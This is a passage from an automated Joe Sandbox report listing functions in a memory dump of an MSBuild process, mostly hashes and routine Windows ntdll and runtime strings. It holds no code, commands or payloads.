Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction ID: 2243fca4af98019e83e0a522d62c0f35c0a3b670b71945f777fb8aacec44b8f8
Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction Fuzzy Hash: 01D0C93A616E80CFD61BCB0CCAA4B1633B4BB45F44F850490F541CBB22E63CDA40CA40

Function 01A9C700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction ID: 0a269634b0f158104b77b8baca14440511708856db56a8d82aafc74fc82ac444
Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction Fuzzy Hash: 31C08033150644AFD711DF95CD01F1277A9FB98B40F010021F30447570C531FD10E644

Function 01A80310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: 074ce2ab2c94499562d5fa9ca428c86821b4dee188765ca0919451cf58ff5a80
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: 61D01236100248EFCB02EF41D990D9A772AFBD8710F109019FD19076108A31ED62DA50

Function 01A60750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: a32fd1d28dab55708f6bafaa64cd9a426fcafb021ad64a7b16bd88f1f51556f1
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: BFC04879701A828FCF16DB2AD7D4F9977E8FB44740F164890E809CBB22E724E905DA11

Function 01AA4340 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f08a5e0f5ac83c638757b987ed5b15c343273378c5d84ad0bb958db080277dc3
Instruction ID: 9484fed2b3858a27f0f769905131d94cea0dbcded38ce0b15da790c9e07c089c
Opcode Fuzzy Hash: f08a5e0f5ac83c638757b987ed5b15c343273378c5d84ad0bb958db080277dc3
Instruction Fuzzy Hash: 46900231605840129140715C4CC4586400DA7E0301F56C015E0425554DCA188A565761

Function 01AA4650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4a78538d6975db700e1a2f5c6c6ed2d877725fabb903dad9342638683408829
Instruction ID: 09910045a0296ba97c436692620484b1f58504c80be549ac3b39532e03e45ac0
Opcode Fuzzy Hash: a4a78538d6975db700e1a2f5c6c6ed2d877725fabb903dad9342638683408829
Instruction Fuzzy Hash: FA900261601540424140715C4C44446600DA7E1301796C119A0555560DC61C89559769

Function 01AA2BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a2abaa93f1de6a71048dca568f2c5b7eb1696c9b07b9662a001d358fe9933e
Instruction ID: 448c694ff27290805554a3ec4d2855c7175cff11d7d69201c11bad7bfab5dbe1
Opcode Fuzzy Hash: a6a2abaa93f1de6a71048dca568f2c5b7eb1696c9b07b9662a001d358fe9933e
Instruction Fuzzy Hash: 4790023160544802D150715C4854786000D97D0301F56C015A0025654EC7598B557BA1

Function 01AA2B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 170023a07dd6b39535936e53a61226f97871f6c011930b95ea96ad2fb5eb661f
Instruction ID: 61aed0e03c3765daf6e71c13e68e1a34bc4f4034a0babc50f0d70f71446eca5e
Opcode Fuzzy Hash: 170023a07dd6b39535936e53a61226f97871f6c011930b95ea96ad2fb5eb661f
Instruction Fuzzy Hash: 6690023120144802D104715C4C446C6000D97D0301F56C015A6025655FD66989917631

Function 01AA2BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a96254028ddca072d0b7ecfcb8ebf05647023807a53776b4cf37a5315641be8
Instruction ID: 2a06029c3761f34fef074afdfd5270bc8ce90117effbd38289413749fd68a8a0
Opcode Fuzzy Hash: 3a96254028ddca072d0b7ecfcb8ebf05647023807a53776b4cf37a5315641be8
Instruction Fuzzy Hash: 3E90023120548842D140715C4844A86001D97D0305F56C015A0065694ED6298E55BB61

Function 01AA2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ced04b532cbe272739f48fb0c20fb80049a9b91c8d85597c3224a2da757130dd
Instruction ID: 1e60b989e10a83fb82506e14db635310581693fa349598b06f630f2399a77f6f
Opcode Fuzzy Hash: ced04b532cbe272739f48fb0c20fb80049a9b91c8d85597c3224a2da757130dd
Instruction Fuzzy Hash: 589002A1201580924500B25C8844B4A450D97E0201F56C01AE1055560DC52989519635

Function 01AA2AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e98cabc29c7780b6d2b5d248497894384a752c94a657b249b9c8521cb5abec67
Instruction ID: 3d23ea4689dc128b4fa3dca65c72449c53e8ee033478cdb0767f0900998107b6
Opcode Fuzzy Hash: e98cabc29c7780b6d2b5d248497894384a752c94a657b249b9c8521cb5abec67
Instruction Fuzzy Hash: 96900225221440020145B55C0A4454B044DA7D6351796C019F1417590DC62589655721

Function 01AA2DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e66d4ab2a80ec86c47c361ce6c749e18cc3f45aac27ccda674a9f450cabbcb2
Instruction ID: 9affd5c449445bed94344f34ebbfe4de440d8e278fc457f71bb4c45a8c4808ce
Opcode Fuzzy Hash: 4e66d4ab2a80ec86c47c361ce6c749e18cc3f45aac27ccda674a9f450cabbcb2
Instruction Fuzzy Hash: CF90023124144402D141715C4844646000DA7D0241F96C016A0425554FC6598B56AF61

Function 01AA2D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9308d05975e94670243fa1e9f99f1b2f164979227a7d7364ddb2cff9101de695
Instruction ID: 867fe696bb4433e87f788bbcb700d5a73fe766792f5071a258785fcddcfccbc4
Opcode Fuzzy Hash: 9308d05975e94670243fa1e9f99f1b2f164979227a7d7364ddb2cff9101de695
Instruction Fuzzy Hash: D790022120548442D100755C5848A46000D97D0205F56D015A1065595EC6398951A631

Function 01AA2CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 525358900d9c29fd87c5a552e905079d26281a0093279a1874e728150b8619ad
Instruction ID: 7f8ee1df69a3416e5af55cc498df096804906b3435be2b33183f6138558cc587
Opcode Fuzzy Hash: 525358900d9c29fd87c5a552e905079d26281a0093279a1874e728150b8619ad
Instruction Fuzzy Hash: 1690023120144403D100715C5948747000D97D0201F56D415A0425558ED65A89516621

Function 01AA2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 169722fd146c77f5ee25c5cac8bc6554442bd0222609b83ceb95f159854fc06b
Instruction ID: e567ec61314908eea8a012b9ecbcbf3c8c2512ee062f75525ecd7806babaf716
Opcode Fuzzy Hash: 169722fd146c77f5ee25c5cac8bc6554442bd0222609b83ceb95f159854fc06b
Instruction Fuzzy Hash: 3790022160544402D140715C5858746001D97D0201F56D015A0025554EC65D8B556BA1

Function 01AA2C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee01e66153320bb6e42ff79b6c524534f65734101c8965e17228d2fb9a75051e
Instruction ID: 521f8de50992d73b370a9ce9e29aeae706241fbfec9eaed1eda6e21447128113
Opcode Fuzzy Hash: ee01e66153320bb6e42ff79b6c524534f65734101c8965e17228d2fb9a75051e
Instruction Fuzzy Hash: 8F90023120144842D100715C4844B86000D97E0301F56C01AA0125654EC619C9517A21

Function 01AA2FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af99c29dde9923be1d621a6fd4efbf7952fa1acaf7721105449a50bf983beee4
Instruction ID: 5326d42ee2847088f04da45350ec2eab619eb6337dc5b4dc0198c083749b31c3
Opcode Fuzzy Hash: af99c29dde9923be1d621a6fd4efbf7952fa1acaf7721105449a50bf983beee4
Instruction Fuzzy Hash: 8A90023120184402D100715C4C48787000D97D0302F56C015A5165555FC669C9916A31

Function 01AA2F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 986877181d5a65922941810d2d0c7e9cf0f1d92a216f4885cd77b805df6360f8
Instruction ID: 26888f7f14651adf3cde60836333f025be834a9d445320a54d8f8e244a0edb5d
Opcode Fuzzy Hash: 986877181d5a65922941810d2d0c7e9cf0f1d92a216f4885cd77b805df6360f8
Instruction Fuzzy Hash: C090047131144043D104715C4C44747004DD7F1301F57C017F3155554DC53DCD715735

Function 01AA2EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e979e150bf6e79bec957cec800d074b75b226e0bee92d0977789446aa13ef56
Instruction ID: 1d2aca9121437d6701b8b285733217eedeb034c6697a643651e612e27de21b37
Opcode Fuzzy Hash: 0e979e150bf6e79bec957cec800d074b75b226e0bee92d0977789446aa13ef56
Instruction Fuzzy Hash: F490026120184403D140755C4C44647000D97D0302F56C015A2065555FCA2D8D516635

Function 01AA2E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b684f72c7d4d44b5bb7b45c17d19d975f0b235db79c1f149966e60f77c38107
Instruction ID: 6a2b189ab386368b015a75c8ccddb9bde954a5eb73743e74166f79ccae948da0
Opcode Fuzzy Hash: 1b684f72c7d4d44b5bb7b45c17d19d975f0b235db79c1f149966e60f77c38107
Instruction Fuzzy Hash: D890022130144402D102715C4854646000DD7D1345F96C016E1425555EC6298A53A632

Function 01AA3090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0818ae7443608623bf50c481100ad4d28c9c060e0e2ec59b4703eaf809c9ecb8
Instruction ID: 185101ae922c5fc9a638133a5cfc915c25b900f7fbc98ce4810d1fe8141b9a3f
Opcode Fuzzy Hash: 0818ae7443608623bf50c481100ad4d28c9c060e0e2ec59b4703eaf809c9ecb8
Instruction Fuzzy Hash: 9690022124144802D140715C8854747000ED7D0601F56C015A0025554EC61A8A656BB1

Function 01AA3010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33f2b32b87d67d52a80efcdc0f86975938b0db9e4a1f9a89d1120ef31935e284
Instruction ID: d318abd0305ae12ce42356d976c8cf3c7b8ecb96d0444dd4ee2b47e3f83e5242
Opcode Fuzzy Hash: 33f2b32b87d67d52a80efcdc0f86975938b0db9e4a1f9a89d1120ef31935e284
Instruction Fuzzy Hash: 3E90022120188442D140725C4C44B4F410D97E1202F96C01DA4157554DC91989555B21

Function 01AA35C0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49e1e400a5e76c1ae5a173aefa72c44ca7e9fcc1996549fdd10d553b4d450767
Instruction ID: b93589c0df8f3c3ae03cb57799661316a0061c4450e7c4e6cb6a8caa9f10eec2
Opcode Fuzzy Hash: 49e1e400a5e76c1ae5a173aefa72c44ca7e9fcc1996549fdd10d553b4d450767
Instruction Fuzzy Hash: 4390023160554402D100715C4954746100D97D0201F66C415A0425568EC7998A516AA2

Function 01AA39B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fc7c236d7ac4063eddda0cf3786dcd7268ea225a582ab5bad6c458e4c0f36b1
Instruction ID: 8a81e492c42843af9b2c6f4952b932e8cf94567d84b05ba265e3b93ec447967f
Opcode Fuzzy Hash: 9fc7c236d7ac4063eddda0cf3786dcd7268ea225a582ab5bad6c458e4c0f36b1
Instruction Fuzzy Hash: 0590022124549102D150715C4844656400DB7E0201F56C025A0815594EC55989556721

Function 01AA3D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf9f69cce5bf5b1848597a71bb882e75a955fe9feb35add021930c6a1dea0338
Instruction ID: d8bd868f9b41d4814cf972b5b1d684c6a941f00c13c11bffd04c74f7459870a2
Opcode Fuzzy Hash: cf9f69cce5bf5b1848597a71bb882e75a955fe9feb35add021930c6a1dea0338
Instruction Fuzzy Hash: 14900231202441429540725C5C44A8E410D97E1302F96D419A0016554DC91889615721

Function 01AA3D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82be913e95cfcc6751d71bba7d8c4d40fe9ae189ab370824fc1fa6aba3dc219d
Instruction ID: 13eeca31bcfc217f8fc03b88b3c9076862830c48aab3ae3e69eb84ea0d5e57d0
Opcode Fuzzy Hash: 82be913e95cfcc6751d71bba7d8c4d40fe9ae189ab370824fc1fa6aba3dc219d
Instruction Fuzzy Hash: C490023520144402D510715C5C44686004E97D0301F56D415A0425558EC65889A1A621

Function 01AA2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 13d512d5140e679bfda04669b3a76830754d4f4709cb1f3a7db6e75aa6e4440d
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01AA2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01AA293C
___swprintf_l.LIBCMT ref: 01AA295E
___swprintf_l.LIBCMT ref: 01AA29A3
___swprintf_l.LIBCMT ref: 01ADA52E

Strings

:%u.%u.%u.%u, xrefs: 01ADA5B8
::ffff:0:%u.%u.%u.%u, xrefs: 01ADA54E
ffff:, xrefs: 01ADA504
::%hs%u.%u.%u.%u, xrefs: 01ADA527

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 9a58fb5acd71173446ca8ceb30769b27fdd4676d1e4928a38031e6600278f0e1
Instruction ID: 542441c8bd0945dd6ff54eec24e202d29e1754729a10c77cbe357045b76df461
Opcode Fuzzy Hash: 9a58fb5acd71173446ca8ceb30769b27fdd4676d1e4928a38031e6600278f0e1
Instruction Fuzzy Hash: A151F8B2A04556BFCB11DFADC9C0A7EFBB8BB48640B94816AF465D7641D334DE1087E0

Function 01B12410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01B124A6
___swprintf_l.LIBCMT ref: 01B124E2
___swprintf_l.LIBCMT ref: 01B1257D
___swprintf_l.LIBCMT ref: 01B125A3
___swprintf_l.LIBCMT ref: 01B125C8
___swprintf_l.LIBCMT ref: 01B12608

Strings

ffff:, xrefs: 01B1247D, 01B1249D
::ffff:0:%u.%u.%u.%u, xrefs: 01B124DA
::%hs%u.%u.%u.%u, xrefs: 01B1249E
:%u.%u.%u.%u, xrefs: 01B125FF

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 9380c0c2a88343a939420c99bd219509a988564c9844121d827e21402b971757
Instruction ID: aade3c8ae451731c969371f2fd01958e8c4b6f81075bf18b06f0cedf0f7e58f4
Opcode Fuzzy Hash: 9380c0c2a88343a939420c99bd219509a988564c9844121d827e21402b971757
Instruction Fuzzy Hash: 17510571A00645AEDF38DF9CC99097FBBF8EF44200BA584E9E596C7646E774DA008760

Function 01A97630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 01AD4787
ExecuteOptions, xrefs: 01AD46A0
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01AD46FC
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01AD4725
Execute=1, xrefs: 01AD4713
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01AD4655
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01AD4742

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 7378a1cf98b54eed76dc12459b60b7ff656cc8008fe495c054bc3b65d8a87e7d
Instruction ID: 21642e450f120f339b2c769c0b58b715c6fb7f5eb847aee51c962fb34cc71179
Opcode Fuzzy Hash: 7378a1cf98b54eed76dc12459b60b7ff656cc8008fe495c054bc3b65d8a87e7d
Instruction Fuzzy Hash: CC5109316102197BEF11AFE9DD89FBE77F8EF58300F080099D605AB181E7709A858FA0

Function 01B36940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 7d4b540db99fe06cfa421d68de311b326063fa0884794c99e4ba8b67bea87a98
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: 27022671508342AFD709CF18C590A6FBBE5EFC8700F448A6DF9998B264DB31EA15CB52

Function 01AAB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01AAB6BF

Strings

+, xrefs: 01AAB65A
0, xrefs: 01AAB66F
-, xrefs: 01AAB650
0, xrefs: 01AAB695

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 37116f5cd9db83c16e531d3282a7a68fc70cc9fe1c5ba67ff8e2f1e452b3d197
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 9D818070E062499EEF25CF6CC8917FEBFB2AF45320F9C425AD861A7291C77498408B71

Function 01B120E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01B1214F
___swprintf_l.LIBCMT ref: 01B12172

Strings

[, xrefs: 01B1212B
%%%u, xrefs: 01B12146
]:%u, xrefs: 01B12169

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: fca2e6d9daa210e92b7bd88f9910c3e8ccd823be1a1330334954757f4b53417e
Instruction ID: 22881ba6a99758ecd640eed91ae0bddbfd0c47c06e46829d8f6a5f2f80d9ae3b
Opcode Fuzzy Hash: fca2e6d9daa210e92b7bd88f9910c3e8ccd823be1a1330334954757f4b53417e
Instruction Fuzzy Hash: 8821957AE00119ABDB14DF7ACD40AFEBBF8EF54650F550196E905E3205E730DA118BA0

Function 01A8F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01AD031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01AD02BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01AD02E7

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 3b2281e200762f6ebb8a478cd6fca5ad0d32f8e64c87adebd86418afd9b7a90b
Instruction ID: f389ca07d8eb2fe095b28c6c1082122ceea144a1a5678141fac7e739428735eb
Opcode Fuzzy Hash: 3b2281e200762f6ebb8a478cd6fca5ad0d32f8e64c87adebd86418afd9b7a90b
Instruction Fuzzy Hash: E5E1AE30604B429FE725EF28C984B2ABBE0BF84314F140A6DF5A6CB2E1D774D945CB52

Function 01A9BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

